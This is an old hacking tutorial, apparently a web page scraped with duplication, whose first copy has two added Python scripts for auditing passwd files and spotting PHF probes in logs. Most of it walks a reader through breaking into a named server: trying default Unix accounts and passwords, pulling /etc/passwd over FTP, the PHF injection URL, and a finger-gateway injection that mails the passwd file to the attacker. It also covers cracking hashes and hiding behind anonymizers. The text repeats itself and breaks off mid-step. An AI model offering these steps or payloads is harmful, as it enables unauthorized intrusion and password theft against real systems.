[This worked - I got the server type!]
[None of that worked...]
RUNNING LAME PROGRAMS:
You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you can't even figure out what you're dealing with here?
A final resort is to run a program called Whats Running? It doesn't work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.
If that doesn't work, do anything to find the server type. Even write them an e-mail asking what operating system they're running.
[Ok, I've got the Info... Now I want access!]
HACKING THROUGH THE PASSWORD:
We will now try to go through the front door of the server. To continue our analogy, we are trying to find the combination of the safe.
[Ok, I Want Root!]
[Nah, I already know this server will need exploits]
EASY THINGS FIRST:
You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP spoofing and social engineering, just to find that we could have got in by using:
$Login: root
$Password: root
So, let's just try this first and get it out of the way. Unix comes set up with some default passwords, and sometimes these are not changed. So, we telnet to froggy.com.au.
Don't use your usual telnet program. Unless you are using a filched or anonymous account, it will show your IP address to froggy.com.au. With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.
Then try the following accounts and passwords:
ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins, meaning they only have power over what files/processes they own.
[Nup... Didn't think it would work]
[Incredible... That Lame Trick Actually Worked!]
USING THE LOGIN NAMES:
Still simple things first. About 1 in 20 people are stupid enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.
For example, if the web site made a reference to fred@froggy.com.au, try logging in (through telnet or an FTP program to their server) as:
$Login: Fred
$Password: Fred
Do this with all the names you have found - you might get lucky.
Did this work?
[Nah, they had some badass security, didn't work]
[Oh, Golly Gee... I got access to one of the accounts!]
GETTING THE PASSWD FILE:
You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.
Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks whether the passwords you gave were correct or not. There is a file called 'passwd' on each Unix system which has an entry for every user, including their encrypted password. So, if we can't guess the passwords, we will now try to rip this file and decrypt it.
[Make it so, Number 1]
ANCIENT CHINESE FTP METHOD:
Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can't use proxies. If in your port scan you found an open port 21, it's a pretty good indication that they run an FTP server.
Using your stealth browser, try to FTP to froggy.com.au. Example: ftp://froggy.com.au
If that does not work, try to FTP to ftp.froggy.com.au. Example: ftp://ftp.froggy.com.au
If that does not work, try to FTP to the Domain Name Servers listed when you did your WHOIS search. Example: ftp://ns1.froggy.com.au
[Ok, I'm In]
[Nah, stupid thing won't let me in]
ANCIENT CHINESE FTP METHOD:
Now you are connected to froggy.com.au's FTP server, click on their /etc directory.
You should see a file called 'passwd' and maybe a file called 'group'. Download the 'passwd' file, and look at it.
If it looks like this when you open it, you are in luck:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
For example, we know a login is “kangaroo” and their encrypted password is “3A62i9qr”. Note - this is not their password, but an encrypted form of their password.
Or, did it look more like this:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Is the second field, the encrypted password, replaced by *'s or x's? This is bad – it is called a shadowed password. The real encrypted passwords have been moved into a separate file that only root can read, so there is nothing here to decrypt. This is how most passwd files are nowadays. However, if you got a passwd file which has some non-shadowed entries, you can have a go at decrypting it.
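From the sysadmin's side, the two things above (the stock default-account list and a passwd file whose second field still holds real hashes) are exactly what an audit should catch. The script below is an added example, not part of the original tutorial: it parses a passwd file and reports entries that need fixing. The sample input reuses the lines shown above plus a few constructed ones (the 'guest', 'toor', 'sync' and 'daemon' lines are made up), and the locked-password markers and no-login shells it recognises are assumptions about the target system.

```python
"""Audit a Unix passwd file for the weaknesses described above: visible
(non-shadowed) password hashes, empty password fields, extra UID 0 accounts,
and stock vendor accounts that still have a login shell."""
from __future__ import annotations
from dataclasses import dataclass
from typing import List

# The stock accounts the tutorial lists as shipping with vendor default passwords.
DEFAULT_ACCOUNTS = {
    "root", "sys", "bin", "mountfsys", "adm", "uucp", "nuucp", "anon", "user",
    "games", "install", "demo", "umountfsys", "sync", "admin", "guest", "daemon",
}
# Shells that do not give an interactive login (assumed set; extend per system).
NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin", "/bin/sync"}
# Password-field values meaning "hash kept in the shadow file" or "account locked".
SHADOW_MARKERS = {"*", "x", "!", "!!", "*LK*", "NP"}

# Constructed sample: the first four lines are the ones shown in the tutorial
# (including the truncated one), the rest are made up for the audit.
SAMPLE_PASSWD = """\
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
guest::200:200:Guest account:/home/guest:/bin/sh
toor:x:0:0:backup root:/root:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
"""


@dataclass
class PasswdEntry:
    name: str
    pw: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines. Malformed lines (e.g. a truncated dump) are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit() or not f[3].isdigit():
            continue
        entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
    return entries


def is_shadowed_or_locked(pw: str) -> bool:
    """True when the field carries no usable hash (shadowed or locked)."""
    return pw in SHADOW_MARKERS or pw.startswith("!")


def audit_passwd(text: str) -> List[str]:
    """Return one human-readable finding per weakness found."""
    findings = []
    for e in parse_passwd(text):
        if e.pw == "":
            findings.append(f"{e.name}: empty password field, no password needed to log in")
        elif not is_shadowed_or_locked(e.pw):
            findings.append(f"{e.name}: password hash visible in world-readable passwd (not shadowed)")
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: extra UID 0 (root-level) account")
        if e.name in DEFAULT_ACCOUNTS and e.name != "root" and e.shell not in NOLOGIN_SHELLS:
            findings.append(f"{e.name}: stock vendor account still has login shell {e.shell}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

Run against a real /etc/passwd, every "hash visible" line means the box should be converted to shadow passwords, and every stock account with a shell should be locked or given a no-login shell.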
[Nah, It was all shadowed]
[Nah, couldn't find the passwd file in the first place]
[Yes! I think I got some non-shadowed passwords]
DECRYPTING PASSWD FILES:
There are a few programs around which were written to decrypt Unix passwd files. The most famous one was called 'Cracker Jack'. Many 'hacking' texts strongly recommend this program – but they are mostly talking rubbish. It's old and most systems will just crash when they try to run it, as it uses weird memory allocation.
The best Unix cracker around is currently called 'John the Ripper 1.5'. It is readily available. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute force technique used is genius. But you have to go down to DOS to use it.
You will also need a large 'wordfile', with every English word. The bigger the better. The crack programs test every word in the wordfile against the passwd file. If the wordfile is big enough, you have a good chance of getting a password.
[Yes! I Got Me Some Decrypted Passwords!]
[Nah, the Encryption was too Good]
[Give me some reading about all the different password crackers, where to find them, etc.]
THE OLD-STYLE PHF TECHNIQUE:
Although most servers have now trashed a program called PHF, let's just make sure... If it is working, it lets you get the passwd file remotely, even if it is inside hidden and root-access-only directories.
In the Overlord Anonymizer, type:
http://www.froggy.com.au/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
If PHF is active (often not), this string will print out the /etc/passwd file straight to your web browser. All you need to do is save it as a file and again run a crack program against it.
Now, if you see the words 'Smile! You're on Candid Camera!', it means that the server is protected against this hack, and has logged your IP. But don't worry. So long as you were using the anonymizer, you are safe.
[Nah, they fixed that PHF Bug Problem]
[Yes! I Got Me Some Encrypted Passwords!]
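From the server's side, the request above is easy to spot in the web access log, which is what the 'Candid Camera' replacement is doing. The script below is an added example (not from the original tutorial) that scans Common Log Format lines for PHF probes and for the shell metacharacters such a CGI injection needs; it also covers the finger gateway described in the next section, since that works the same way. The log lines are constructed and the client addresses are made up.

```python
"""Scan web-server access logs for the PHF-style CGI probes described above.

The request pattern is a /cgi-bin/ script whose query carries a URL-encoded
newline (%0a) or another shell metacharacter, so that a shell-backed CGI
script runs an extra command. The sample log lines are constructed.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote, urlsplit

# Common Log Format: host ident user [time] "method target protocol" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Characters that let a shell-backed CGI script run a second command.
SHELL_META = re.compile(r'[\n;|`]|\$\(')

# Constructed sample log (made-up client addresses from documentation ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/1998:13:55:36 +1000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1234
203.0.113.7 - - [10/Oct/1998:13:56:01 +1000] "GET /cgi-bin/finger?user=kangaroo%3B/bin/cat%20/etc/passwd HTTP/1.0" 200 512
198.51.100.4 - - [10/Oct/1998:14:02:10 +1000] "GET /cgi-bin/finger?user=kangaroo HTTP/1.0" 200 300
198.51.100.4 - - [10/Oct/1998:14:02:15 +1000] "GET /index.html HTTP/1.0" 200 2048
203.0.113.7 - - [10/Oct/1998:14:05:00 +1000] "GET /cgi-bin/phf?Qalias=x%250a/bin/ls HTTP/1.0" 404 210
"""


def classify_request(target: str) -> Optional[str]:
    """Label a request target as a PHF probe / CGI injection, or None if benign.

    Only the URL is examined: a POST body (as sent by the finger form) is not
    in the access log, so this catches GET-style probes only.
    """
    parts = urlsplit(target)
    if not parts.path.startswith("/cgi-bin/"):
        return None
    script = parts.path.rsplit("/", 1)[-1]
    # Decode twice: a double-encoded %250a survives one round as %0a.
    decoded = unquote(unquote(parts.query))
    injected = SHELL_META.search(decoded) is not None
    if script == "phf":
        # Any request for phf is worth a look; the metacharacter makes it an attack.
        return "phf probe with command injection" if injected else "phf probe"
    if injected:
        return f"shell metacharacter in {script} query"
    return None


def scan_access_log(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client, target, label) for every suspicious request in the log."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m.group("target"))
        if label:
            findings.append((m.group("host"), m.group("target"), label))
    return findings


if __name__ == "__main__":
    for client, target, label in scan_access_log(SAMPLE_LOG):
        print(f"{client} {label}: {target}")
```

Note that a 404 on the phf request still counts: the script being gone is the fix, and the probe is still worth logging against that client.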
FINGER BOX HACKING:
Finger servers are hacker's friends. Let's find out whether www.froggy.com.au has a finger server.
In the Anonymizer, assuming that the server's name starts with www, type www.froggy.com.au/cgi-bin/finger
If the finger gateway is operational, a box should appear for you to enter the name you want to finger, which gives you another chance to receive the /etc/passwd file.
Okay,
1/ Get your list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@froggy.com.au", and that your email address is "your@email.org").
2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@froggy.com.au ; /bin/mail your@email.org < etc/passwd
This takes the passwd file through kangaroo@froggy.com.au and emails it to your email address. If this works you now have the /etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box.
[Nah, it didn't work]
[Yes! I Got Me Some Encrypted Passwords!]
LINUX INSTALLATION:
All the above really has given you the basic ideas. To do anything further, and implement any real exploits, you will have to put a Linux operating system on your computer. Below are some instructions on how to quickly and easily install Linux on your computer. You can just download the files below for free, and install them in a directory on your MS-DOS / Windows system! That's right, you don't even have to repartition your Hard Drive!
Okay... I will make this as basic and free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux before. You have a Hard Drive with at least 100MB free. You've got a floppy drive, etc. You know how to unzip files. And you don't want to spend any money. Luckily, Linux is free and easy to set up.
1/ Download this file (Australia). It's big, like 34MB. But it's all you need. If the site there is overloaded, get it here.
2/ What you have is a version of Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up. I don't use Slackware, and there are some better versions around now - like RedHat 5.2. But, it is a good stable version - and, like I say, very simple to download and set up. Good for a Linux test drive.
3/ Ok, make a directory called 'Linux' on your Hard Drive. That's right, with this distro, you don't even have to repartition your drive. It can be on the same Hard Drive you have Windows on! (I told you this would be easy). Just make sure it's a major directory on your hard drive, like c:\linux - not in a subdirectory anywhere.
4/ Now, just unzip all the contents of the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.
5/ Now, here's the hardest part. You will have to edit the \linux\linux.bat file. Open it in an editor.
6/ You'll need to edit the LINUX.BAT file, and make sure the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive, you can make the line:
\linux\loadlin \linux\vmlinuz root=/dev/hda1 (hda1 means the IDE1 Master HDD)
I have Linux on my drive D: (the IDE2 Master HDD), and for me the line would be:
\linux\loadlin \linux\vmlinuz root=/dev/hdc1
7/ If you are unsure, the Linux.bat file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right shift key and PageUp) when the kernel halts to go back and look at your partitions, noting the names Linux gives them. With this information, you should be able to edit the LINUX.BAT correctly.
8/ Well, I skipped ahead of myself. You are now (already) ready to boot up your Linux system. Who said it was hard?
9/ Ok, you must go 'Shut Down' and 'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run Linux.bat
10/ The Linux system will load itself over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so only Linux loads).
11/ You will see a whole lot of stuff loading. Then you will see a login: prompt.
12/ You have an operating system just like all the big net servers have!
13/ Okay, just type in 'root', and you have root access on the system. You will want to give yourself a password, so type 'passwd'. Choose something you will remember. Without it, you cannot log in.
14/ Now you will have a black screen with a # looking at you. Don't let that worry you - it's just like an MS-DOS screen. A few commands for now: 'ls' (like 'dir' in MS-DOS), 'cd' (change directory, like DOS), 'pico' (an editor, use like 'pico text.txt'), and 'mc' (this is a nice menu program that comes with zipslack).
15/ Now, type 'setup'.
16/ Set up your mouse, network settings, screen stuff. Really easy. Just like - 'are you using a 2 button mouse or 3'? Easy.
17/ Now, if you want net access through this, type 'pppsetup'. This starts the PPP (point to point protocol) setup. You will need to know all your internet settings, like your Gateway, Nameserver numbers, etc. If you don't know these, go back to Windows and see what values you used from the Control Panel : Internet section.
18/ Okay. Reboot. Your mouse should be working, with some luck. Hopefully, your modem will be able to dial. Though, often not. If you have a standard external modem on Com 2, it is probably okay. Otherwise, it's sometimes a pain to configure your modem for Linux.
19/ If you are having modem troubles, type 'mc' to run the Midnight Commander. Open the 'etc' directory, then 'rc.d', then 'serials.rc'. Comment out the auto config section with '#' signs. And go to the manual config section. Uncomment /dev/cua0 (Com 1:) and /dev/cua1 (Com 2:) - or /dev/cua2 or cua3 (Com 3: or 4:) for internal modem users. Now, from Windows, go to Accessories:System Tools:System Information (Win 98) to get the IRQ and Port Settings for your modem. If you are in Win95, I think you have to run something called msd.com in the \windows directory. Put these settings in. Then, edit S.rc and, at the bottom, uncomment the place where it says to call the serials.rc file.
20/ If you have a CD-Rom you can also edit S.rc so that it checks for a CD Rom during bootup.
21/ All things going well, you should now have a fully functional Unix type system on your computer. You can download all your latest little X-Crush programs (in .tgz format). To setup Software - say a Linux stealth port scanner, save the .tgz file in a directory and run 'pkgtool'. Then go 'install file'. Real easy. If it is a C program, type 'gcc program.c' to compile it.
22/ Well, you are missing a Windows type interface. You don't need one. But if you want to surf using Linux, etc., it is better to have a graphical interface - although you can run a browser called 'lynx' just through the vanilla Linux interface.
23/ You can get some things, like X-Windows from ftp.cdrom.com/pub/linux/slackware/slakware/x1/
24/ Just get all the files that look vital (about 8 of them), and run pkgtool to install them all. You will probably find that setting up X-Win for the first time is a huge pain. It was for me at least - you need to know, for example, the horizontal and vertical refresh rates of your monitor. Then, get something like the Linux Netscape, or Arena, as a browser. These run through X-Windows.
25/ You will have fun tweaking everything as you like it. There are dozens of windows interfaces to choose from. Some look almost identical to Win95.
26/ Where from here? You can now do practically anything - you basically have all the net power your ISP does, except for all the phone lines. You can let people use you as a dial up ISP, you can host web pages and set up FTP sites to run from your computer. You can set up email addresses, nameservers... anything.
27/ Because Linux is the same software as most ISPs run, a lot of hackers use Linux. You will be able to issue commands to other servers. You can ask other servers about themselves. For example, type 'showmount -e victim.com'. You can also run things like 'ping', and 'traceroute' directly from your command line. You can send mail from your own sendmail program so that it is untraceable.
Some last incentives: if you were brought up in the Windows world and are afraid of command prompts, just type 'mc'. The zipslack distro comes with this 'Midnight Commander' - which I use a lot. And play a few games on the thing. There are a few old favourites installed by default - like 'trek', and 'adventure', etc. If you were in computers 20 years ago, you will know what I mean. The games directory is in usr/games.
If you have got any more problems, there are a lot of people on the IRC #Linux channel on undernet who are very helpful. If your Linux is set up to the net, you can run the Linux Bitch-X IRC program to get there. Zipslack also has pine (for email), tin (for newsgroups), and lynx (for surfing).
Fact is, once you have got this all working for a few weeks (and are probably loving it), you will no doubt like to try some more advanced Linux distros. Although there are a lot of personal feelings about various distributions, I recommend RedHat 5.2 Linux. You will find it very easy to install.
If you are happy buying through Amazon.Com, here is the best Linux deal I've been able to find anywhere. It deals with the 3 major Linux distributions: Red Hat, Slackware, and Debian - with 3 CDs. It also contains a very good install guide. All for about half the price of the single 'official' RedHat CD. If you like this Linux stuff, I recommend you get it - or at least make sure you get a book that is written very recently.
CURRENT LIMIT:
You have reached the current limit of the tutorials.... I will add further steps when I get the time and if people like these lessons. Also, if people want to write sections up for this, just mail the sections to me, to the e-mail address listed at Cyberarmy.Com.
Until this gets bigger, I can suggest a few books that teach hacking. I've found that a lot of books are rubbish and just teach how to change screen colours, but there are a few that every hacker should have in their library.
THE ESSENTIAL HACKER'S LIBRARY:
ESSENTIAL BOOKS:
1. MAXIMUM SECURITY: Of course, Maximum Security has to be at number one. I guess this would probably be the central book in any hacker's library. Goes through a heap of techniques like a textbook with over 900 pages.
2. THE HAPPY HACKER: Essential for newbies. Although this book is bagged a lot by people who hate Carolyn, I think most people agree it would be the perfect first book a newbie should read. Explains things pretty well, spelling mistakes and all, but probably an essential newbie primer. Though, as I say, if you know your stuff you can safely forget this one.
ESSENTIAL SOFTWARE:
1. LINUX: You will need to change to Linux to do any serious hacking. But thankfully, it is fairly simple and you can just set up Linux in a separate partition on your Hard Drive and set for a dual boot option: usually Windows, and when you are hacking, Linux. Your amount of 'Net Power' increases 500%. If you want to buy Linux, make sure you get the latest version, not an obsolete one. There are also several different 'flavours' of Linux; you will probably want to start with RedHat, then possibly move to Slackware after a year or so. So, make sure you get a deal which gives you the opportunity to check out some of the different distributions. By far the best Linux deal I've found around is this one. It has an excellent Linux manual, and comes with three separate Linux distributions on 3 CDs, including the very latest RedHat and Slackware. It's also excellent value (about half the price of buying the single 'official' RedHat CD).
NOT ESSENTIAL, BUT RECOMMENDED BOOKS:
(These books are mainly just part of the Hacker Culture)
3. THE WATCHMAN: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen: This one will not teach you anything, so stuff it if you just want to learn. Although it was one of the best reads I ever had. More like a thriller book, but it was real! The Kevin Mitnick books are about the same, but this one deals a lot with phreaking, and scamming radio stations out of cars. But, as I say, it doesn't go through any techniques, so stuff it if you just want to learn stuff.
4. THE FUGITIVE GAME: Online With Kevin Mitnick: Again, a really fun read (though I prefer the Poulsen book) but it doesn't go through any hacking techniques. But I have to list it here because it is such a good read. It's also a really cheap buy.
5. TAKEDOWN: The Pursuit and Capture of Kevin Mitnick: This is the other side of the Mitnick story (written by the cops who chased him). Interesting, but the essential Mitnick book is the one above. Though, this is a very good primer on how the FBI operates to capture hackers. But, again, no techniques listed. For techniques, you would only have luck in the first two books listed.
Okay, as for programming books - stuff it. You can download the things for free if you search for "perl + programming + tutorial" and things like that. Unless you like printed books, forget that. So, the only other thing is Linux. You will need to have Linux as a dual boot option on your PC if you want to do any serious hacking.
Some books that suck: these are some books that are going around that are a rip-off. SECRETS OF A SUPER HACKER: This is another book that a lot of people have. The book seemed like a real waste of time to me.
So, keep going through this tutorial as it gets bigger, read anything you find on the web. Get some of the major books above, at least 1 and 2, and read them very carefully - four or five times. Join your local Linux users group, if you have one. And, later on, download a few guides on programming and read through them when you get some time. With some effort (it isn't easy), you can become a respected hacker and take control of the Net.
[Back to Index]
CONGRATULATIONS:
You have gained access.
If you now have the login name and password, you may use the user's mail account, FTP privileges (change their web pages by uploading new ones), and HTTP access.
(If you have only got access to a user level account, do not despair. If you have a user level account, it is easy to use that to later get a root level account. More on this when this study is made bigger).
[None of that worked...]
RUNNING LAME PROGRAMS:
You *need* to know the server type to have any hope of hacking the thing. How do you expect to run exploits against it if you cant even figure out what you're dealing with here?
A final resort is to run a program called Whats Running? It doesn't work very well, but will sometimes tell you the server type. It will also probably be logged by the victim server.
If that doesn't work, do anything to find the server type. Even write them an e-mail asking what operating system they're running.
[Ok, I've got the Info... Now I want access!]
HACKING THROUGH THE PASSWORD:
We will now try to go through the front door of the server. As to our analogy, we are trying to find the combination of the safe.
[Ok, I Want Root!]
[Nah, I already know this server will need exploits]
EASY THINGS FIRST:
You would kick yourselves if ya spent weeks trying advanced hacking with exploits, IP spoofing and social
engineering, just to find that we could have got in by using:
$Login: root
$Password: root
So, let’s just try this first and get it out of the way. Unix comes set up with some default passwords, and
sometimes these are not changed. So, we telnet to froggy.com.au .
Don’t use your usual telnet program. Unless you are using a filched or anonymous account, it will show
your IP address to froggy.com.au . With your proxies changed, and everything set for stealth, switch back to the Anonymous Telnet window.
Then try the following accounts and passwords:
ACCOUNT: PASSWORD
(login) root: (password)root
sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon
The accounts root, mountfsys, umountfsys, install, and sometimes sync are root level accounts, meaning they have sysop power, or total power. Other logins are just "user level" logins meaning they only have power
over what files/processes they own.
[Nup... Didn't think it would work]
[Incredible... That Lame Trick Actually Worked!]
USING THE LOGIN NAMES:
Still simple things first. About 1 in 20 people are stupid enough to have the same login name and password. With your list of all the email addresses or finger information you dug from the site, try this.
For example, if the web site made a reference to fred@froggy.com.au , try logging in (through telnet or a FTP
program to their server) as:
$Login: Fred
$Password: Fred
Do this with all the names you have found - you might get lucky.
Did this work?
[Nah, they had some baddass security, didn't work]
[Oh, Golly Gee... I got access to one of the accounts!]
GETTING THE PASSWD FILE:
You probably had no luck until now. Actually, most hacking techniques only have a slim chance of success. You just try hundreds of slim chances till you get it.
Assuming you were trying to log in on a Unix system, you may have been wondering how Unix checks to see whether the passwords you gave were correct or not. There is a file called ‘passwd’ on each Unix system which has all the passwords for each user. So, if we can’t guess the passwords, we will now try to rip this file and decrypt it.
[Make it so, Number 1]
ANCIENT CHINESE FTP METHOD:
Your browser should be set to use the fake proxies. We will keep using this browser to FTP, because it cannot be easily traced, whereas something like CuteFTP can be traced to you because it can't use proxies. If in your port scan, you found an opne port 21, its a pretty good indication that they run an FTP server.
Using your stealth browser, try to FTP to froggy.com.au . Example: ftp://froggy.com.au
If that does not work, try to FTP to ftp.froggy.com.au . Example: ftp://ftp.froggy.com.au
If that does not work, try to FTP to the Domain Name Servers listed when you did your WHOIS search. Example: ftp://ns1.froggy.com.au
[Ok, I'm In]
[Nah, stupid thing won't let me in]
ANCIENT CHINESE FTP METHOD:
Now you are connected to froggy.com.au ’s FTP server, click on their \etc directory.
You should see a file called ‘passwd’ and maybe a file called ‘group’. Download the ‘passwd’ file, and
look at it.
If it looks like this when you open it, you are in luck:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
[etc.]
For example, we know a login is “kangaroo” and their encrypted password is “3A62i9qr”. Note - this is not their password, but an encrypted form of their password.
Or, did it look more like this:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
Is the second, encrypted password, section replaced by *’s or x’s? This is bad – it is called a shadowed
password and cannot be decrypted. This is how most passwd files are now days. However, if you got a
passwd file which has some non-shadowed entries, you can put your hand to decrypting it.
[Nah, It was all shadowed]
[Nah, couldn't find the passwd file in the first place]
[Yes! I think I got some non-shadowed passwords]
DECRYPTING PASSWD FILES:
There are a few programs around which were written to decrypt Unix passwd files. The most famous one was called ‘Cracker Jack’. Many ‘hacking’ texts strongly recommend this file – but they are mostly talking rubbish. Its old and most systems will just crash when they try to run it, as it uses weird memory allocation.
The best Unix cracker around is currently called 'John the Ripper 1.5’. It is readily avaliable. It was only written in the last year or so, and is a lot faster than Cracker Jack ever was. John the Ripper was also designed with Pentiums in mind, and the brute force techique used is genius. But you have to go down to DOS to use it.
You will also need a large ‘wordfile’, with every English word. Bigger the better. The Crack Programs test every word in the wordfile against the passwd file. If the wordfile is big enough, you have a good chance of getting a password.
[Yes! I Got Me Some Decrypted Passwords!]
[Nah, the Encryption was too Good]
[Give me some reading about all the different password crackers, where to find them, etc.
THE OLD-STYLE PHF TECHNIQUE:
Although most servers have now trashed a program called PHF, let's just make sure... It is is working, it lets you get the passwd file remotely, even if it is inside hidden and root access only directories.
In the Overlord Anonymizer, type:
http://www.froggy.com.au /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd.
OVERLORD ANONYMIZER
If PHF is active (often not), this string will print out the etc/passwd file strait to your web browser all you need to do is save it as a file and again run a crack program against it.
Now, if you see the words 'Smile! You're on Candid Camera!', it means that the server is protected against this hack, and has logged your IP. But don't worry. So long as you were using the anonymizer, you are safe.
[Nah, they fixed that PHF Bug Problem]
[Yes! I Got Me Some Encrypted Passwords!]
FINGER BOX HACKING:
Finger servers are hacker's friends. Let's find out whether www.froggy.com.au has a finger server.
In the Anonymizer, assuming that the server's name starts with www, type www.froggy.com.au /cgi-bin/finger
OVERLORD ANONYMIZER
If the finger gateway is operational a box should appear for you to enter the name you want to finger. If it is operational you have another chance to receive the etc/passwd file.
Okay, 1/ get your list of e-mail addresses you found for the site (let's pretend one of them is "kangaroo@froggy.com.au ", and that your email address is "your@email.org")
2/ Go back to the finger box, and type this in (changing these email addresses for the real ones):
kangaroo@froggy.com.au ; /bin/mail your@email.org < etc/passwd This takes the passwd file through kangaroo@froggy.com.au and emails it to your email address. If this works you now have the etc/passwd file in your mailbox.... you can now run a crack program against it and have a little fun on their box. [Nah, it didn't work] [Yes! I Got Me Some Encrypted Passwords!] LINUX INSTALLATION All the above really has given you the basic ideas. To do anything firther, and impliment any real exploits, you will have to put a Linux operating system on your computer. Below are some instructions on how to quickly and easily install Linux on your computer. You can just download the files below for free, and install them in a directory on your MS-DOS / Windows system! That's right, you dont even have to repartition your Hard Drive! Okay... I will make this as basic and free as possible. I will assume you are running Windows 95 or 98 and have never seen Linux before. You have a Hard Drive with at least 100MB free. Youve got a floppy drive, etc. You know how to unzip files. And you dont want to spend any money. Luckily, Linux is free and easy to set up. 1/ Download this file
2/ What you have is a version of Slackware Linux, called zipslack. It's a very simple version of Slackware Linux to set up. I don't use Slackware, and there are some better versions around now - like RedHat 5.2. But, it is a good stable version - and, like I say, very simple to download and setup. Good for a Linux test drive.
3/ Ok, make a directory called 'Linux' on your Hard Drive. That's right, with this distro, you dont even have to repartition your drive. It can be on the same Hard Drive you have Windows on! (I told you this would be easy). Just make sure its a major directory on your hard drive, like c:\linux - not in a subdirectory anywhere.
4/ Now, just unzip all the contents of the zipslack.zip into the right directories, like c:\linux\etc, c:\linux\usr, etc.
5/ Now, heres the hardest part. You will have to edit the \linux\linux.bat file. Open it in an editor.
6/ You'll need to edit the LINUX.BAT file, and make sure the root=/dev/XXXX points to your Hard Drive. If you have put it on your main hard drive, you can make the line:
\linux\loadlin \linux\vmlinuz root=/dev/hda1 (hda1 means the IDE1 Master HDD)
I have Linux on my drive D: (the IDE2 Master HDD), and for me the line would be:
\linux\loadlin \linux\vmlinuz root=/dev/hdc1
7/ If you are unsure, the Linux.bat file has a long list of examples. Just guess. If you get it wrong, you'll still be able to use scrollback (right shift key and PageUp) when the kernel halts to go back and look at your partitions, noting the names Linux gives them. With this information, you should be able to edit the LINUX.BAT correctly.
8/ Well, I skipped ahead of myself. You are now (already) ready to boot up your Linux system. Who said it was hard?
9/ Ok, you must go 'Shut Down' and 'Restart in MS-DOS Mode'. Then just go to the \Linux directory ('cd linux') and run Linux.bat
10/ The Linux system will load itself over MS-DOS (though you don't need to load it over DOS - later you can make a boot-disk so only linux loads).
11/ You will see a whole lot of stuff loading. Then you will see a login: prompt.
12/ You have an operating system just like all the big net servers have!
13/ Okay, just type in 'root', and you have root access on the system. You will want to give yourself a password, so type 'passwd'. Choose something you will remember. Without it, you cannot log in.
